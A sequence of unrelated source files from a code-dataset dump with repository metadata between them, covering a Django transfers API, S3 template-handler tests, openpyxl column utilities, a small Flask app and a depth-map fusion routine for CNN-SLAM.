# LOG.error(f"Failed to symlink file {Format.path(target)} -> {Format.path(source)}")
raise
def copy_file(path: Path, destination: Path) -> None:
shutil.copyfile(path, destination)
assert destination.is_file()
assert not destination.is_symlink()
def is_relative_symlink_from_to(symlink: Path, destination: str) -> bool:
if not symlink.is_symlink():
return False
path = symlink.parent
resolved_symlink = symlink.resolve()
if not resolved_symlink.samefile(path / destination):
return False
link = os.readlink(symlink)
is_relative = not Path(link).is_absolute()
return is_relative
def copy_directory(from_dir: Path, to_path: Path):
# TODO: Replace rmdir() with copytree(dirs_exist_ok=True) when support for Python 3.7 is dropped
to_path.rmdir()
shutil.copytree(from_dir, to_path, symlinks=True)
def copy_file(from_path: Path, to_path: Path):
shutil.copyfile(from_path, to_path)
def copy(from_path: Path, to_path: Path):
if from_path.is_dir():
copy_directory(from_path, to_path)
else:
copy_file(from_path, to_path)
|
[
"noreply@github.com"
] |
JrGoodle.noreply@github.com
|
b3eb7c18665a3b298e682d5a4ce0aeb8f4de9c6b
|
c8d5f8720431138cff38118e624cd98333358f9b
|
/api/transfers/transfers.py
|
cd4569fe51e93eea6ca439423459096d28ec1f58
|
[
"MIT"
] |
permissive
|
mindthegrow/cannlytics
|
e0170d3a023b82e4165147ba578e773a53fbcc4d
|
c266bc1169bef75214985901cd3165f415ad9ba7
|
refs/heads/main
| 2023-07-13T22:17:56.640684
| 2021-08-30T18:14:39
| 2021-08-30T18:14:39
| 392,468,093
| 0
| 0
|
MIT
| 2021-08-03T22:03:29
| 2021-08-03T22:03:28
| null |
UTF-8
|
Python
| false
| false
| 16,935
|
py
|
"""
Transfers Views | Cannlytics API
Created: 4/21/2021
Updated: 8/30/2021
API to interface with laboratory transfers.
"""
# pylint:disable=line-too-long
# External imports
from rest_framework.decorators import api_view
from rest_framework.response import Response
# Internal imports
from api.auth.auth import authorize_user
from api.api import get_objects, update_object, delete_object
@api_view(['GET', 'POST', 'DELETE'])
def transfers(request, transfer_id=None):
"""Get, create, or update transfers."""
# Initialize.
model_id = transfer_id
model_type = 'transfers'
model_type_singular = 'transfer'
# Authenticate the user.
claims, status, org_id = authorize_user(request)
if status != 200:
return Response(claims, status=status)
# GET data.
if request.method == 'GET':
docs = get_objects(request, claims, org_id, model_id, model_type)
return Response({'success': True, 'data': docs}, status=200)
# POST data.
# TODO: Send transfer to the organization.
# TODO: Notify the receiving organization.
# TODO: Post to Metrc if user specifies.
elif request.method == 'POST':
data = update_object(request, claims, model_type, model_type_singular, org_id)
if data:
return Response({'success': True, 'data': data}, status=200)
else:
message = 'Data not recognized. Please post either a singular object or an array of objects.'
return Response({'error': True, 'message': message}, status=400)
# DELETE data.
elif request.method == 'DELETE':
success = delete_object(request, claims, model_id, model_type, model_type_singular, org_id)
if not success:
            message = f'You must be an owner or quality assurance to delete {model_type}.'
return Response({'error': True, 'message': message}, status=403)
return Response({'success': True, 'data': []}, status=200)
@api_view(['POST'])
def receive_transfers(request):
"""Receive incoming transfers."""
    raise NotImplementedError  # returning the exception class was a bug; raise it until this endpoint is implemented
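#-----------------------------------------------------------------------
# Example request (editor's sketch)
#-----------------------------------------------------------------------
# The base URL, authorization header, and payload fields below are assumptions
# for illustration only; they are not defined by this module.
#
#   import requests
#
#   url = 'https://example.com/api/transfers'
#   headers = {'Authorization': 'Bearer <your-token>'}
#   payload = {'transfer_id': 'T0001', 'status': 'pending'}
#
#   # GET lists transfers for the authorized organization.
#   print(requests.get(url, headers=headers).json())
#
#   # POST creates or updates a transfer (a single object or a list of objects).
#   print(requests.post(url, json=payload, headers=headers).json())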
#-----------------------------------------------------------------------
# Draft functionality
#-----------------------------------------------------------------------
# Get licensed courier.
# courier = track.get_employees(license_number=lab.license_number)[0]
# # Create a testing package
# test_package_tag = 'YOUR_TEST_PACKAGE_TAG'
# test_package_data = {
# 'Tag': test_package_tag,
# 'Location': 'Warehouse',
# 'Item': 'New Old-Time Moonshine Teenth',
# 'Quantity': 4.0,
# 'UnitOfMeasure': 'Grams',
# 'Note': 'Quality assurance test sample.',
# 'ActualDate': today,
# 'Ingredients': [
# {
# 'Package': 'ABCDEF012345670000013677',
# 'Quantity': 4.0,
# 'UnitOfMeasure': 'Grams'
# }
# ]
# }
# track.create_packages(
# [test_package_data],
# license_number=cultivator.license_number,
# qa=True
# )
# # Get the tested package.
# test_package = track.get_packages(label=test_package_tag, license_number=cultivator.license_number)
# # Step 1a Set up an external Incoming transfer
# # using: POST/transfers/v1/external/incoming
# transfer_data = {
# 'ShipperLicenseNumber': cultivator.license_number,
# 'ShipperName': cultivator.name,
# 'ShipperMainPhoneNumber': '18005555555',
# 'ShipperAddress1': 'Mulberry Street',
# 'ShipperAddress2': None,
# 'ShipperAddressCity': 'Oklahoma City',
# 'ShipperAddressState': 'OK',
# 'ShipperAddressPostalCode': '123',
# 'TransporterFacilityLicenseNumber': lab.license['number'],
# # 'DriverOccupationalLicenseNumber': grower.license['number'],
# # 'DriverName': grower.full_name,
# # 'DriverLicenseNumber': 'xyz',
# # 'PhoneNumberForQuestions': '18005555555',
# # 'VehicleMake': 'xyz',
# # 'VehicleModel': 'xyz',
# # 'VehicleLicensePlateNumber': 'xyz',
# 'Destinations': [
# {
# 'RecipientLicenseNumber': lab.license_number,
# 'TransferTypeName': 'Lab Sample Transfer',
# 'PlannedRoute': 'Hypertube.',
# 'EstimatedDepartureDateTime': get_timestamp(),
# 'EstimatedArrivalDateTime': get_timestamp(future=60 * 24),
# 'GrossWeight': 4,
# # 'GrossUnitOfWeightId': None,
# 'Transporters': [
# {
# 'TransporterFacilityLicenseNumber': lab.license_number,
# 'DriverOccupationalLicenseNumber': courier.license['number'],
# 'DriverName': courier.full_name,
# 'DriverLicenseNumber': 'xyz',
# 'PhoneNumberForQuestions': '18005555555',
# 'VehicleMake': 'xyz',
# 'VehicleModel': 'xyz',
# 'VehicleLicensePlateNumber': 'xyz',
# # 'IsLayover': False,
# 'EstimatedDepartureDateTime': get_timestamp(),
# 'EstimatedArrivalDateTime': get_timestamp(future=60 * 24),
# # 'TransporterDetails': None
# }
# ],
# 'Packages': [
# {
# # 'PackageLabel': traced_package.label,
# # 'HarvestName': '2nd New Old-Time Moonshine Harvest',
# 'ItemName': 'New Old-Time Moonshine Teenth',
# 'Quantity': 1,
# 'UnitOfMeasureName': 'Each',
# 'PackagedDate': get_timestamp(),
# 'GrossWeight': 4.0,
# 'GrossUnitOfWeightName': 'Grams',
# 'WholesalePrice': None,
# # 'Source': '2nd New Old-Time Moonshine Harvest',
# },
# ]
# }
# ]
# }
# track.create_transfers(
# [transfer_data],
# license_number=cultivator.license_number,
# )
# # Step 1b Set up another external Incoming transfer
# # using: POST/transfers/v1/external/incoming
# second_transfer_data = {
# 'ShipperLicenseNumber': cultivator.license_number,
# 'ShipperName': cultivator.name,
# 'ShipperMainPhoneNumber': '18005555555',
# 'ShipperAddress1': 'Mulberry Street',
# 'ShipperAddress2': None,
# 'ShipperAddressCity': 'Oklahoma City',
# 'ShipperAddressState': 'OK',
# 'ShipperAddressPostalCode': '123',
# 'TransporterFacilityLicenseNumber': cultivator.license['number'],
# 'DriverOccupationalLicenseNumber': courier.license['number'],
# 'DriverName': courier.full_name,
# 'DriverLicenseNumber': 'xyz',
# 'PhoneNumberForQuestions': '18005555555',
# 'VehicleMake': 'xyz',
# 'VehicleModel': 'xyz',
# 'VehicleLicensePlateNumber': 'xyz',
# 'Destinations': [
# {
# 'RecipientLicenseNumber': cultivator.license_number,
# 'TransferTypeName': 'Beginning Inventory Transfer',
# 'PlannedRoute': 'Hypertube.',
# 'EstimatedDepartureDateTime': get_timestamp(),
# 'EstimatedArrivalDateTime': get_timestamp(future=60 * 24),
# 'GrossWeight': 56,
# # 'GrossUnitOfWeightId': null,
# 'Transporters': [
# {
# 'TransporterFacilityLicenseNumber': cultivator.license_number,
# 'DriverOccupationalLicenseNumber': courier.license['number'],
# 'DriverName': courier.full_name,
# 'DriverLicenseNumber': 'xyz',
# 'PhoneNumberForQuestions': '18005555555',
# 'VehicleMake': 'xyz',
# 'VehicleModel': 'xyz',
# 'VehicleLicensePlateNumber': 'xyz',
# # 'IsLayover': false,
# 'EstimatedDepartureDateTime': get_timestamp(),
# 'EstimatedArrivalDateTime': get_timestamp(future=60 * 24),
# # 'TransporterDetails': null
# }
# ],
# 'Packages': [
# {
# # 'PackageLabel': traced_package.label,
# # 'HarvestName': '2nd New Old-Time Moonshine Harvest',
# 'ItemName': 'New Old-Time Moonshine Teenth',
# 'Quantity': 2,
# 'UnitOfMeasureName': 'Ounces',
# 'PackagedDate': get_timestamp(),
# 'GrossWeight': 56.0,
# 'GrossUnitOfWeightName': 'Grams',
# 'WholesalePrice': 720,
# # 'Source': '2nd New Old-Time Moonshine Harvest',
# },
# ]
# }
# ]
# }
# track.create_transfers(
# [second_transfer_data],
# license_number=cultivator.license_number,
# )
# # Step 2 Find the two Transfers created in Step 1a and 1b
# # by using the date search: GET/transfers/v1/incoming
# traced_transfers = track.get_transfers(
# license_number=cultivator.license_number,
# start=today,
# end=get_timestamp()
# )
# # Step 3 Update one of the Transfers created in Step 1 by
# # using: PUT/transfers/v1/external/incoming
# second_transfer_data['TransferId'] = traced_transfers[0].id
# second_transfer_data['Destinations'][0]['Packages'][0]['Quantity'] = 3
# track.update_transfers(
# [second_transfer_data],
# license_number=cultivator.license_number,
# )
# updated_transfer = track.get_transfers(
# # uid=second_transfer_data['TransferId'],
# license_number=cultivator.license_number,
# start=get_timestamp(past=15),
# end=get_timestamp()
# )
# #------------------------------------------------------------------
# # Transfer templates ✓
# #------------------------------------------------------------------
# # Step 1a Set up a Template using: POST/transfers/v1/templates
# template_data = {
# 'Name': 'HyperLoop Template',
# 'TransporterFacilityLicenseNumber': cultivator.license_number,
# 'DriverOccupationalLicenseNumber': courier.license['number'],
# 'DriverName': courier.full_name,
# # 'DriverLicenseNumber': None,
# # 'PhoneNumberForQuestions': None,
# # 'VehicleMake': None,
# # 'VehicleModel': None,
# # 'VehicleLicensePlateNumber': None,
# 'Destinations': [
# {
# 'RecipientLicenseNumber': lab.license_number,
# 'TransferTypeName': 'Affiliated Transfer',
# 'PlannedRoute': 'Take hyperlink A to hyperlink Z.',
# 'EstimatedDepartureDateTime': get_timestamp(),
# 'EstimatedArrivalDateTime': get_timestamp(future=360),
# 'Transporters': [
# {
# 'TransporterFacilityLicenseNumber': transporter.license_number,
# 'DriverOccupationalLicenseNumber': courier.license['number'],
# 'DriverName': courier.full_name,
# 'DriverLicenseNumber': 'dash',
# 'PhoneNumberForQuestions': '18005555555',
# 'VehicleMake': 'X',
# 'VehicleModel': 'X',
# 'VehicleLicensePlateNumber': 'X',
# 'IsLayover': False,
# 'EstimatedDepartureDateTime':get_timestamp(),
# 'EstimatedArrivalDateTime': get_timestamp(future=360),
# 'TransporterDetails': None
# }
# ],
# # 'Packages': [
# # {
# # 'PackageLabel': new_package_tag,
# # 'WholesalePrice': 13.33
# # },
# # ]
# }
# ]
# }
# track.create_transfer_templates([template_data], license_number=cultivator.license_number)
# transfer_template = TransferTemplate.create_from_json(track, template_data)
# # Get the template
# templates = track.get_transfer_templates(license_number=cultivator.license_number, start=today)
# first_template = templates[0]
# # Step 1b Set up another Template using: POST/transfers/v1/templates
# second_template_data = {
# 'Name': 'Tunnel Template',
# 'TransporterFacilityLicenseNumber': cultivator.license_number,
# 'DriverOccupationalLicenseNumber': courier.license['number'],
# 'DriverName': courier.full_name,
# 'Destinations': [
# {
# 'RecipientLicenseNumber': lab.license_number,
# 'TransferTypeName': 'Lab Sample Transfer',
# 'PlannedRoute': 'Take the tunnel, turning left at the donut bar.',
# 'EstimatedDepartureDateTime': get_timestamp(),
# 'EstimatedArrivalDateTime': get_timestamp(future=360),
# }
# ]
# }
# track.create_transfer_templates([second_template_data], license_number=cultivator.license_number)
# templates = track.get_transfer_templates(license_number=cultivator.license_number, start=today, end='2021-04-10')
# second_template = templates[0]
# # Step 2 Find the two Templates created in Step 1a and 1b by
# # using the date search: GET/transfers/v1/templates
# templates = track.get_transfer_templates(license_number=cultivator.license_number, start=today)
# # Step 3 Find a Template by the Template ID number
# # using: GET/transfers/v1/templates/{id}/deliveries
# template_deliveries = track.get_transfer_templates(
# uid=templates[1].uid,
# action='deliveries',
# license_number=cultivator.license_number
# )
# # Step 4 Update one of the Templates created in Step 1
# # using: PUT/transfers/v1/templates
# templates[1].update(name='Premier Hyperloop Template')
# updated_template = {**template_data, **{
# 'TransferTemplateId': templates[1].uid,
# 'Name': 'Premier Hyperloop Template'
# }}
# track.update_transfer_templates([updated_template], license_number=cultivator.license_number)
# template = track.get_transfer_templates(uid=templates[1].uid, license_number=cultivator.license_number)
# print(template.last_modified)
# #------------------------------------------------------------------
# # Outgoing transfers ✓
# #------------------------------------------------------------------
# # Step 1 Find an Incoming Transfer: GET/transfers/v1/incoming
# incoming_transfers = track.get_transfers(license_number=retailer.license_number)
# # Step 2 Find an Outgoing Transfer: GET/transfers/v1/outgoing
# outgoing_transfers = track.get_transfers(
# transfer_type='outgoing',
# license_number=cultivator.license_number
# )
# facilities = track.get_facilities()
# for facility in facilities:
# print('Getting transfers for', facility.license['number'])
# outgoing_transfers = track.get_transfers(
# transfer_type='outgoing',
# license_number=facility.license['number']
# )
# if outgoing_transfers:
# break
# sleep(5)
# # Step 3 Find a Rejected Transfer: GET/transfers/v1/rejected
# rejected_transfers = track.get_transfers(
# transfer_type='rejected',
# license_number=cultivator.license_number
# )
# # Step 4 Find a Transfer by the Manifest ID number: GET/transfers/v1/{id}/deliveries
# transfer_id = 'YOUR_TRANSFER_ID'
# traced_transfer = track.get_transfers(uid=transfer_id, license_number=cultivator.license_number)
# # Step 5 Find The Packages Using the Delivery ID number: GET/transfers/v1/delivery/{id}/packages
# traced_transfer_package = track.get_transfer_packages(uid=transfer_id, license_number=cultivator.license_number)
# # Transfers Wholesale Step 6 Find Packages Wholesale Pricing
# # Using the Delivery ID GET/transfers/v1/delivery/{id}/packages/wholesale
# traced_wholesale_package = track.get_transfer_packages(
# uid=transfer_id,
# action='packages/wholesale',
# license_number=cultivator.license_number
# )
|
[
"keeganskeate@gmail.com"
] |
keeganskeate@gmail.com
|
31757302a42d24ea7a276b1a53b6c2b4abcde137
|
4f9ca946a91759831a1cf2a037c8b4c43c556935
|
/tests/test_template_handlers/test_s3.py
|
db8e926ae5c313d08911c09f34c839e4b52d3f08
|
[
"Apache-2.0"
] |
permissive
|
CitrineInformatics/sceptre
|
591c59b15b2e9bf7c308bcf67e2aa2719c1112dd
|
8ae45066a78c72d53dfe6f1c76dcc64f670c136a
|
refs/heads/main
| 2023-01-09T22:56:50.172103
| 2021-11-29T16:58:15
| 2021-12-23T01:31:37
| 179,547,771
| 0
| 2
|
NOASSERTION
| 2022-10-27T20:55:34
| 2019-04-04T17:48:16
|
Python
|
UTF-8
|
Python
| false
| false
| 4,538
|
py
|
# -*- coding: utf-8 -*-
import json
import io
import pytest
from mock import MagicMock
from sceptre.connection_manager import ConnectionManager
from sceptre.exceptions import SceptreException, UnsupportedTemplateFileTypeError
from sceptre.template_handlers.s3 import S3
from unittest.mock import patch
class TestS3(object):
def test_get_template(self):
connection_manager = MagicMock(spec=ConnectionManager)
connection_manager.call.return_value = {
"Body": io.BytesIO(b"Stuff is working")
}
template_handler = S3(
name="s3_handler",
arguments={"path": "bucket/folder/file.yaml"},
connection_manager=connection_manager
)
result = template_handler.handle()
connection_manager.call.assert_called_once_with(
service="s3",
command="get_object",
kwargs={
"Bucket": "bucket",
"Key": "folder/file.yaml"
}
)
assert result == b"Stuff is working"
def test_template_handler(self):
connection_manager = MagicMock(spec=ConnectionManager)
connection_manager.call.return_value = {
"Body": io.BytesIO(b"Stuff is working")
}
template_handler = S3(
name="vpc",
arguments={"path": "my-fancy-bucket/account/vpc.yaml"},
connection_manager=connection_manager
)
result = template_handler.handle()
connection_manager.call.assert_called_once_with(
service="s3",
command="get_object",
kwargs={
"Bucket": "my-fancy-bucket",
"Key": "account/vpc.yaml"
}
)
assert result == b"Stuff is working"
def test_invalid_response_reraises_exception(self):
connection_manager = MagicMock(spec=ConnectionManager)
connection_manager.call.side_effect = SceptreException("BOOM!")
template_handler = S3(
name="vpc",
arguments={"path": "my-fancy-bucket/account/vpc.yaml"},
connection_manager=connection_manager
)
with pytest.raises(SceptreException) as e:
template_handler.handle()
assert str(e.value) == "BOOM!"
def test_handler_unsupported_type(self):
s3_handler = S3("s3_handler", {'path': 'bucket/folder/file.unsupported'})
with pytest.raises(UnsupportedTemplateFileTypeError):
s3_handler.handle()
@pytest.mark.parametrize("path", [
("bucket/folder/file.json"),
("bucket/folder/file.yaml"),
("bucket/folder/file.template")
])
@patch('sceptre.template_handlers.s3.S3._get_template')
def test_handler_raw_template(self, mock_get_template, path):
mock_get_template.return_value = {}
s3_handler = S3("s3_handler", {'path': path})
s3_handler.handle()
assert mock_get_template.call_count == 1
@patch('sceptre.template_handlers.helper.render_jinja_template')
@patch('sceptre.template_handlers.s3.S3._get_template')
    def test_handler_jinja_template(self, mock_get_template, mock_render_jinja_template):
mock_get_template_response = {
"Description": "test template",
"AWSTemplateFormatVersion": "2010-09-09",
"Resources": {
"touchNothing": {
"Type": "AWS::CloudFormation::WaitConditionHandle"
}
}
}
mock_get_template.return_value = json.dumps(mock_get_template_response).encode('utf-8')
s3_handler = S3("s3_handler", {'path': 'bucket/folder/file.j2'})
s3_handler.handle()
assert mock_render_jinja_template.call_count == 1
@patch('sceptre.template_handlers.helper.call_sceptre_handler')
@patch('sceptre.template_handlers.s3.S3._get_template')
def test_handler_python_template(self, mock_get_template, mock_call_sceptre_handler):
mock_get_template_response = {
"Description": "test template",
"AWSTemplateFormatVersion": "2010-09-09",
"Resources": {
"touchNothing": {
"Type": "AWS::CloudFormation::WaitConditionHandle"
}
}
}
mock_get_template.return_value = json.dumps(mock_get_template_response).encode('utf-8')
s3_handler = S3("s3_handler", {'path': 'bucket/folder/file.py'})
s3_handler.handle()
assert mock_call_sceptre_handler.call_count == 1
|
[
"noreply@github.com"
] |
CitrineInformatics.noreply@github.com
|
4fd3397c966bca4bd99b3bcbfa9a5b5fbef8fcd5
|
52206eea8d48c3568370d4597dfcc6384166dfa6
|
/tests/download.py
|
b29f52825fd634d43ed4650c05f06a9f3dc449ee
|
[
"MIT"
] |
permissive
|
sweeneyngo/birdysis
|
b9b1ba6308682d2cfcaa799a2ba560e954a12704
|
136c75769d07410b74c74d9df353616e615d4f21
|
refs/heads/master
| 2023-06-16T20:22:01.418020
| 2021-07-10T09:12:03
| 2021-07-10T09:12:03
| 352,833,265
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 105
|
py
|
from birdysis.collect_data import scrape
from birdysis.download import download
download("all_ids.json")
|
[
"sweeneyngo@gmail.com"
] |
sweeneyngo@gmail.com
|
46542fa79977f03009b7bb03b74ec5858e1b234d
|
1dacbf90eeb384455ab84a8cf63d16e2c9680a90
|
/pkgs/openpyxl-2.3.2-py27_0/lib/python2.7/site-packages/openpyxl/utils/__init__.py
|
0c54fa54f4c4b0ce247d980317589d23565ab020
|
[
"Apache-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-unknown"
] |
permissive
|
wangyum/Anaconda
|
ac7229b21815dd92b0bd1c8b7ec4e85c013b8994
|
2c9002f16bb5c265e0d14f4a2314c86eeaa35cb6
|
refs/heads/master
| 2022-10-21T15:14:23.464126
| 2022-10-05T12:10:31
| 2022-10-05T12:10:31
| 76,526,728
| 11
| 10
|
Apache-2.0
| 2022-10-05T12:10:32
| 2016-12-15T05:26:12
|
Python
|
UTF-8
|
Python
| false
| false
| 5,507
|
py
|
from __future__ import absolute_import
# Copyright (c) 2010-2015 openpyxl
"""
Collection of utilities used within the package and also available for client code
"""
import datetime
import re
from .formulas import FORMULAE
from openpyxl.compat import basestring
from openpyxl.utils.exceptions import CellCoordinatesException
# constants
COORD_RE = re.compile('^[$]?([A-Z]+)[$]?(\d+)$')
RANGE_EXPR = """
[$]?(?P<min_col>[A-Z]+)
[$]?(?P<min_row>\d+)
(:[$]?(?P<max_col>[A-Z]+)
[$]?(?P<max_row>\d+))?
"""
ABSOLUTE_RE = re.compile('^' + RANGE_EXPR +'$', re.VERBOSE)
SHEETRANGE_RE = re.compile("""
^(('(?P<quoted>([^']|'')*)')|(?P<notquoted>[^']*))!
(?P<cells>{0})$""".format(RANGE_EXPR), re.VERBOSE)
def get_column_interval(start, end):
if isinstance(start, basestring):
start = column_index_from_string(start)
if isinstance(end, basestring):
end = column_index_from_string(end)
return [get_column_letter(x) for x in range(start, end + 1)]
def coordinate_from_string(coord_string):
"""Convert a coordinate string like 'B12' to a tuple ('B', 12)"""
match = COORD_RE.match(coord_string.upper())
if not match:
msg = 'Invalid cell coordinates (%s)' % coord_string
raise CellCoordinatesException(msg)
column, row = match.groups()
row = int(row)
if not row:
msg = "There is no row 0 (%s)" % coord_string
raise CellCoordinatesException(msg)
return (column, row)
def absolute_coordinate(coord_string):
"""Convert a coordinate to an absolute coordinate string (B12 -> $B$12)"""
m = ABSOLUTE_RE.match(coord_string.upper())
if m:
parts = m.groups()
if all(parts[-2:]):
return '$%s$%s:$%s$%s' % (parts[0], parts[1], parts[3], parts[4])
else:
return '$%s$%s' % (parts[0], parts[1])
else:
return coord_string
def _get_column_letter(col_idx):
"""Convert a column number into a column letter (3 -> 'C')
Right shift the column col_idx by 26 to find column letters in reverse
order. These numbers are 1-based, and can be converted to ASCII
ordinals by adding 64.
"""
    # these indices correspond to A -> ZZZ and include all allowed
# columns
if not 1 <= col_idx <= 18278:
raise ValueError("Invalid column index {0}".format(col_idx))
letters = []
while col_idx > 0:
col_idx, remainder = divmod(col_idx, 26)
# check for exact division and borrow if needed
if remainder == 0:
remainder = 26
col_idx -= 1
letters.append(chr(remainder+64))
return ''.join(reversed(letters))
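# Editor's note -- worked example of the borrow step above: for col_idx = 28,
# divmod(28, 26) == (1, 2) -> 'B', then divmod(1, 26) == (0, 1) -> 'A', and the
# collected letters reverse to 'AB'. For col_idx = 26, divmod(26, 26) == (1, 0);
# the zero remainder is borrowed back to 26 ('Z') and col_idx drops to 0, so the
# result is just 'Z'.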
_COL_STRING_CACHE = {}
_STRING_COL_CACHE = {}
for i in range(1, 18279):
col = _get_column_letter(i)
_STRING_COL_CACHE[i] = col
_COL_STRING_CACHE[col] = i
def get_column_letter(idx,):
"""Convert a column index into a column letter
(3 -> 'C')
"""
try:
return _STRING_COL_CACHE[idx]
except KeyError:
raise ValueError("Invalid column index {0}".format(idx))
def column_index_from_string(str_col):
"""Convert a column name into a numerical index
('A' -> 1)
"""
# we use a function argument to get indexed name lookup
try:
return _COL_STRING_CACHE[str_col.upper()]
except KeyError:
raise ValueError("{0} is not a valid column name".format(str_col))
def range_boundaries(range_string):
"""
Convert a range string into a tuple of boundaries:
(min_col, min_row, max_col, max_row)
    Cell coordinates will be converted into a range with the cell at both ends
"""
m = ABSOLUTE_RE.match(range_string)
min_col, min_row, sep, max_col, max_row = m.groups()
min_col = column_index_from_string(min_col)
min_row = int(min_row)
if max_col is None or max_row is None:
max_col = min_col
max_row = min_row
else:
max_col = column_index_from_string(max_col)
max_row = int(max_row)
return min_col, min_row, max_col, max_row
def rows_from_range(range_string):
"""
Get individual addresses for every cell in a range.
Yields one row at a time.
"""
min_col, min_row, max_col, max_row = range_boundaries(range_string)
for row in range(min_row, max_row+1):
yield tuple('%s%d' % (get_column_letter(col), row)
for col in range(min_col, max_col+1))
def cols_from_range(range_string):
"""
Get individual addresses for every cell in a range.
Yields one row at a time.
"""
min_col, min_row, max_col, max_row = range_boundaries(range_string)
for col in range(min_col, max_col+1):
yield tuple('%s%d' % (get_column_letter(col), row)
for row in range(min_row, max_row+1))
def coordinate_to_tuple(coordinate):
"""
    Convert an Excel style coordinate to a (row, column) tuple
"""
col, row = coordinate_from_string(coordinate)
return row, _COL_STRING_CACHE[col]
def range_to_tuple(range_string):
"""
Convert a worksheet range to the sheetname and maximum and minimum
coordinate indices
"""
m = SHEETRANGE_RE.match(range_string)
if m is None:
raise ValueError("Value must be of the form sheetname!A1:E4")
sheetname = m.group("quoted") or m.group("notquoted")
cells = m.group("cells")
boundaries = range_boundaries(cells)
return sheetname, boundaries
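# Editor's note -- example of the helpers above (values for illustration only):
# range_to_tuple("'Monthly Totals'!A1:E4") returns ("Monthly Totals", (1, 1, 5, 4)):
# the quoted sheet name is unwrapped and the cell range expands to
# (min_col, min_row, max_col, max_row).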
def quote_sheetname(sheetname):
if " " in sheetname:
sheetname = u"'{0}'".format(sheetname)
return sheetname
|
[
"wgyumg@mgail.com"
] |
wgyumg@mgail.com
|
96d955640c214fa097891f16d38bcd5ed4da8453
|
bba4814f15faac544e6721f4233e55b029227764
|
/app.py
|
173889c221b115276f1280125bee070da148d15d
|
[] |
no_license
|
rachl7n/ten-06
|
92bab66d48897dec1d794d171ece2b48e711fbe3
|
4fe38e3651bea7c1a5cb033112db14b8eb237f9e
|
refs/heads/master
| 2022-07-07T11:03:47.162404
| 2020-05-13T17:24:40
| 2020-05-13T17:24:40
| 263,658,239
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 526
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 21 14:57:17 2020
@author: etill
"""
#import statements
from flask import Flask, render_template
#Flask app variable
app = Flask(__name__)
#static route
@app.route("/")
def test():
return render_template("index.html")
@app.route("/1006")
def ten_o_six():
return render_template("1006.html")
@app.route("/personal")
def personal():
return render_template("personal.html")
#start the server
if __name__ == "__main__":
app.run()
|
[
"rachaelclairesullivan@rachaels-mbp.home"
] |
rachaelclairesullivan@rachaels-mbp.home
|
98c90fd8b131550a2728238f0c640581c49629de
|
38b9da5107233b20da0753b8af0c003388a9139f
|
/pypal/wsgi.py
|
a41891b4c4254b7a0a766b5d9a8ac6ef73b031d0
|
[] |
no_license
|
ZTCooper/my_site
|
9bb6bb94ebd713c372fb1f9ef1792af48fd24dcd
|
c648179952eb92e431ffa25765dd39b5d43313f8
|
refs/heads/master
| 2020-03-18T16:16:10.705541
| 2018-06-08T14:33:20
| 2018-06-08T14:33:20
| 134,956,583
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 404
|
py
|
"""
WSGI config for pypal project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "pypal.settings")
application = get_wsgi_application()
|
[
"ztcooper@outlook.com"
] |
ztcooper@outlook.com
|
fcbb5fd03089b7053afd51a4720821afceda74a8
|
e422751d217312de5dec9e970c98c66ca49b6c36
|
/pythonProject/pythonAPI/payload.py
|
c2097f5e3eac8e2807e9e59dff79842f7a30fb95
|
[] |
no_license
|
txtsuresh/Suresh_All
|
408c5fed4d6251187abeea1d371f5f7cd329c4bd
|
0f229d6cad7846e74a1c936430c5c4e3b4f37c1a
|
refs/heads/master
| 2023-01-03T05:01:00.541393
| 2020-11-05T05:04:07
| 2020-11-05T05:04:07
| 292,711,516
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 187
|
py
|
def getBody():
body={
"name": "Learn Appium Automation with Java",
"isbn": "xyz1999911120",
"aisle": "227",
"author": "John foe"
}
return body
|
[
"sureshtxt@gmail.com"
] |
sureshtxt@gmail.com
|
4c52adb6f6fef8364a1da13070c1ceac8ee9e493
|
e23d18d44758eb711d1b59d8ba93b45dc337a59d
|
/pose_estimation/depth_map_fusion.py
|
fb99869ef1aa6e64a248ec38abc93f2cac8609e2
|
[] |
no_license
|
summer1719/CNN_SLAM
|
4c5ecbe95854c7872cc41c547600628d9506da2f
|
cefb9f0cb902963715635d5a6814e1d59872ea0a
|
refs/heads/master
| 2020-03-28T10:02:05.598615
| 2018-09-17T02:39:46
| 2018-09-17T02:39:46
| 148,077,706
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,422
|
py
|
import numpy as np
import cv2
import tensorflow as tf
import sys
import time
def actual_fuse(u,frame,prev_keyframe):
'''
Does the actual fusion of depth and uncertainty map
Arguments:
u: Pixel location
frame: current keyframe of Keyframe class
prev_keyframe: Previous keyframe of Keyframe class
Returns:
Depth and Uncertainty map values at u
'''
u = np.append(u,np.ones(1))
v_temp = frame.D[u[0]][u[1]]*np.matmul(cam_matrix_inv,u) #Returns 3x1 point
    v_temp = np.append(v_temp, 1) # homogeneous coordinate; ndarray has no append()/appenf() method
v_temp = np.matmul(np.matmul(np.linalg.inv(frame.T),prev_keyframe.T),v_temp) #Return 3x1
v_temp = np.matmul(cam_matrix,v_temp)
    v = ((v_temp/v_temp[2])[:2]).astype(int) # pixel coordinates must be integer indices for the lookups below
u_p = (prev_keyframe.D[v[0]][v[1]]*prev_keyframe.U[v[0]][v[1]]/frame.D[u[0]][u[1]]) + sigma_p**2
frame.D[u[0]][u[1]] = (u_p*frame.D[u[0]][u[1]] + frame.U[u[0]][u[1]]*prev_keyframe.D[v[0]][v[1]])/(u_p + frame.U[u[0]][u[1]]) #Kalman filter update step 1
frame.U[u[0]][u[1]] = u_p*frame.U[u[0]][u[1]]/(u_p + frame.U[u[0]][u[1]]) #Kalman filter update step 2
return frame.D[u[0]][u[1]],frame.U[u[0]][u[1]]
def fuse_depth_map(frame,prev_keyframe):
'''
Fuses depth map for new keyframe
Arguments:
frame: New keyframe of Keyframe class
prev_keyframe: Previous keyframe of Keyframe class
Returns:
The new keyframe as Keyframe object
'''
    actual_fuse_v = np.vectorize(actual_fuse) # vectorize comes from numpy (the bare name was undefined)
frame.D,frame.U = actual_fuse_v(index_matrix,frame,prev_keyframe)
